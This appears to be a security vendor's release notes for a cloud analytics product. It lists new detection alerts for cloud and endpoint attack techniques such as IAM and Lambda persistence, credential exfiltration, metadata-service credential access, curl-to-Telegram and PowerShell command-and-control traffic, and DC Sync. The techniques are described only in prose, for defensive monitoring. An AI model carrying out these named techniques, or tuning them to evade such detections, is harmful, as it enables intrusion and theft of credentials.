Previous Release Notes for Secure Cloud Analytics

Attack Chains framework update: Attack chains have been enhanced and are now fully merged with Cisco XDR incidents. Incidents created from attack chains prior to the Cisco XDR release 2.29 will remain open until manually closed, but the attack chains will no longer receive updates. Use the Incidents page in your Cisco XDR portal to investigate any attack chains in the future.

Cisco Meraki telemetry: You can now view telemetry from the Cisco XDR and Meraki integration in Secure Cloud Analytics. For details, see the Cisco Meraki Integration topic.

AWS Anomalous IAM Role Policy Update Alert: This new alert indicates an update was made to an existing Identity and Access Management (IAM) role's AssumeRole policy, and this behavior is unusual in this AWS account. The AssumeRole feature of IAM can be used to establish persistence. This alert requires AWS CloudTrail Logs and is disabled by default.

AWS CloudTrail Statistics Anomaly Observation: This new observation indicates an anomaly was detected based on the AWS CloudTrail events statistics. This observation requires AWS CloudTrail Logs.

AWS Console Login without MFA Alert: This new alert indicates a user logged in to the AWS Management Console without Multi-Factor Authentication (MFA). This alert requires AWS CloudTrail Logs and is disabled by default.

AWS EC2 Multiple SSH Keys Upload Anomaly Alert:This new alert indicates multiple SSH keys were updated on EC2 instances within a short period, which could indicate a persistence mechanism used by attackers. This alert requires AWS CloudTrail Logs and is disabled by default.

AWS GuardDuty Trusted IP List Created Alert: This new alert indicates a GuardDuty trusted IPSet was created for secure communication with AWS infrastructure and applications. GuardDuty doesn't generate findings for IP addresses that are included in IPSets. This capability has legitimate purposes, but has also been utilized by threat actors as a Defense Evasion technique in the past. This alert requires AWS CloudTrail Logs and is disabled by default.

AWS Lambda Backdoor Through Resource-Based Policy Alert: This new alert indicates adversaries may be maintaining their persistence in a victim environment through manipulating permissions on a cloud resource. Providing invoke permissions on a Lambda for an external identity will enable them to maintain their foothold on the given environment. This alert requires AWS CloudTrail Logs and is disabled by default.

AWS Lambda Layer from External Account Added Alert: This new alert indicates another layer of code was added to an AWS Lambda function from an external AWS account. Lambda layers are a legitimate feature for adding dependencies needed by the primary function code. Threat actors have been known to misuse this capability for Persistence or Execution, especially when the layer is from an untrusted external account. This alert requires AWS CloudTrail Logs and is disabled by default.

AWS S3Browser Create Login Profile Alert: This new alert indicates the third party utility S3Browser was used to create a login profile on an existing IAM user. This utility, while legitimate in nature, has been used in numerous threat actor campaigns. This alert requires AWS CloudTrail Logs and is disabled by default.

AWS Session Manager Multiple Instances Utilized Alert: This new alert indicates the AWS Session Manager was utilized to execute commands on multiple Elastic Compute Cloud instances simultaneously. Session Manager is a legitimate administrative tool, but has been utilized for Lateral Movement, Execution and Persistence by threat actors including Advanced Persistent Threats. This alert requires AWS CloudTrail Logs and is disabled by default.

Content Download Using Powershell Alert: This new alert indicates that Powershell was observed to download content. It is common for adversaries to leverage various cmdlets in order to fetch and execute their payloads from remote locations. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Executions of File from Recycle Bin Alert: This new alert indicates adversaries may be leveraging the Recycle Bin to evade detection during the execution stage of their attacks. Several malware families have been observed using this technique in the wild. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Potential Enterprise Chat Command and Control Alert: This new alert indicates adversaries may be leveraging enterprise chat applications to perform their command and control communications. This may be done in an attempt to evade detection. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Suspicious File Download Observed on Process Arguments Alert: This new alert indicates a URL pattern for a file download was observed on a process command line. This activity has features that may be indicative of malicious payload delivery. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

AWS Anomalous RDS Password Reset Alert: This new alert indicates the main user password for a Relational Database Service instance was changed. This alert requires AWS CloudTrail Logs and is disabled by default.

AWS Anomalous Secrets Manager Batch Retrieval Alert: This new alert indicates a batch retrieval of many secrets was made to AWS Secrets Manager by a principal that does not normally perform this action. This alert requires AWS CloudTrail Logs and is disabled by default.

Connection to TOR IP Address Alert: This new alert indicates traffic to a The Onion Router (TOR) IP address was detected. TOR has legitimate privacy preserving features when used on a personal device, but adversaries are known to leverage it for Command and Control traffic and defense evasion. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Endpoint Exfiltration of AWS Credentials Alert: This new alert indicates AWS credentials were accessed by a process that made a network connection. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

GCP API Call Using TOR IP Alert: This new alert indicates a GCP API call was made using an IP address believed to be a TOR Exit Node. This alert requires GCP Audit Logs and is disabled by default.

LDAP Connection from Suspicious Process Alert: This existing alert has been renamed to LDAP Connection from Anomalous Process. This alert has also been improved to be more accurate.

MFA Disabled for Azure Alert: This new alert indicates MultiFactor Authentication (MFA) has been disabled for a user in a Microsoft Azure environment. This alert requires Azure Audit Logs and is disabled by default.

Powershell RDP Connection Alert: This new alert indicates the system utility Powershell was seen making connections over the RDP port, which is indicative of RDP connections. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Powershell WinRM Connection Alert: This new alert indicates the system utility Powershell was seen making connections over the Windows Remote Management (WinRM) port, which is indicative of WinRM connections. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

SMB traffic initiated from a command interpreter Alert: This new alert indicates detection of SMB traffic where the parent process is cmd, PowerShell, or Python (not executed by a system account) and where a significantly larger amount of data is sent than received. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Suspicious File Download Observed on Process Arguments Alert: This new alert indicates a URL pattern indicating a file download was observed on a process command line. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Suspicious MSHTA Activity Alert: This new alert indicates the built in Windows application MSHTA.exe was executed interactively by a non-system user and utilized to make a network connection. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.

Crowdstrike integration enhancement: We now receive domain name and URL indicator of compromise data from Crowdstrike. To view this data in the Secure Cloud Analytics web portal, go to Monitor > Alerts and select an alert from Crowdstrike. In the Supporting Observations section, click the (Expand) icon to open the detailed data that includes domain names and URLs.

Suspicious Curl Request to Telegram Alert: This existing alert has been renamed to Suspicious Request to Telegram. This alert is also now supported on macOS.

AWS Organization Exit Attempt Alert: This new alert indicates an attempt was made by a child account to leave an AWS Organization. Threat actors can perform this technique to impair defenses or monitoring. This alert requires AWS CloudTrail logs and is disabled by default.

Cloud Metadata Service Credential Access Alert: This new alert indicates a request to one of the public cloud Instance Metadata Service endpoints was made for credentials. This alert requires Network Visibility Module (NVM) data and is disabled by default.

DC Sync Attack Behavior Alert: This new alert indicates suspicious behaviors were detected on the endpoint that are known to be part of the DC Sync attack. This alert requires NVM data.

Secure Network Analytics alarm data update: Secure Network Analytics 7.4.2 and 7.5.0 alarm data is used in Endpoint Detection and Response correlated attack chains, which can now be promoted to Cisco XDR as incidents using a webhook through Response Management. For more information, see the Alarm Configuration for Cisco XDR Guide 7.4.2 and Alarm Configuration for Cisco XDR Guide 7.5.0.

Cisco Secure Endpoint update: Cloud IOC engine is now a data source for detections in Cisco XDR. Currently, only high and critical events are sent.

AWS Anomalous IAM Role Policy Update Alert: This new alert indicates there was an update to an existing Identity and Access Management (IAM) role's AssumeRole policy, and this behavior is unusual in this AWS account. This alert is disabled by default.

Suspicious Network Findings by Collection Alert: This new alert indicates suspicious behaviors were detected on the network that are mapped to the Collection MITRE tactic. This alert requires a Network detection and response (NDR) integration.

Suspicious Network Findings by Command and Control Alert: This new alert indicates suspicious behaviors were detected on the network that are mapped to the Command and Control MITRE tactic. This alert requires an NDR integration.

Suspicious Network Findings by Exfiltration Alert: This new alert indicates suspicious behaviors were detected on the network that are mapped to the Exfiltration MITRE tactic. This alert requires an NDR integration.

Suspicious Network Security Finding Observation: This new observation indicates suspicious behavior reported on the network. This observation requires an NDR integration.

Potential Persistence Attempt Alert: This alert has been removed based on an efficacy review. This alert was designed to indicate a device was detected applying known persistence mechanisms like establishing background processes used for network access or running applications from network shares.

Secure Email Threat Defense update: Malicious messages from the Secure Email Threat Defense integration are now correlated to EDR and network alerts by the recipient of the email message. You will now see the recipient username in Secure Cloud Analytics Event Viewer, and then Cisco XDR will analyze messages and correlate events based on the extracted username of the recipient, allowing suspicious or malicious user activity to be correlated across domains. This will exclude common system users, such as administration, system, and root.

Anomalous Azure Custom Script Extensions Alert: This new alert indicates Azure Custom Script Extensions were utilized to execute commands on an Azure Virtual Machine, and this behavior was anomalous for the account it was detected in. While Custom Script Extensions are a legitimate feature of Azure, they have been utilized by threat actors including Advanced Persistent Threat groups in the past. This alert is disabled by default.

Malicious Process Detected Alert: This existing alert now supports macOS data from the Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM).

Azure Anomalous RunCommand Alert: This new alert indicates an Azure RunCommand was successfully utilized to remotely execute a command or commands on an Azure Virtual Machine, and this behavior was anomalous. Though potentially benign, adversaries (including Advanced Persistent Threats) are known to utilize this capability. This alert is disabled by default.

Amazon Web Services Integration: The AWS integration instructions in the Secure Cloud Analytics web portal have been updated to include the Add CloudTrail Logs to Secure Cloud Analytics section. The new S3 configuration will help to remediate the AWS API throttling experienced in large environments. New CloudTrail alerts in Secure Cloud Analytics will use the new S3 configuration. If you are using the API method, you will need to update your CloudTrail configuration. Go to Settings > Integrations > AWS > About to view the new instructions on how to set up the S3 configuration.

Event Viewer NVM Performance Enhancements: Event Viewer performance for NVM queries has been improved with faster page load time and faster query performance.

Potential Gamaredon C2 callout Alert: This new alert indicates a command line utility was used to contact a URL associated with the command-and-control servers of a threat actor known as Gamaredon. Gamaredon (also known as Armageddon, Primitive Bear, and ACTINIUM) is an APT active since 2013 known to leverage spearphishing to infect victims with custom malware.

Potential GhostPulse Malware C2 Alert: This new alert indicates a device exhibited behavior similar to that of the GhostPulse malware family.

Suspicious Curl Request to Telegram Alert: This new alert indicates a suspicious attempt to communicate with the Telegram chat service or the Telegraph blog service using the curl URL command-line tool. Adversaries have been known to use Telegram in this manner for C2 communications.

Heartbeat Observation: This observation has been improved to detect suspicious activity from Azure infrastructure. Previously, Azure activity was considered trusted and excluded from Heartbeat observations.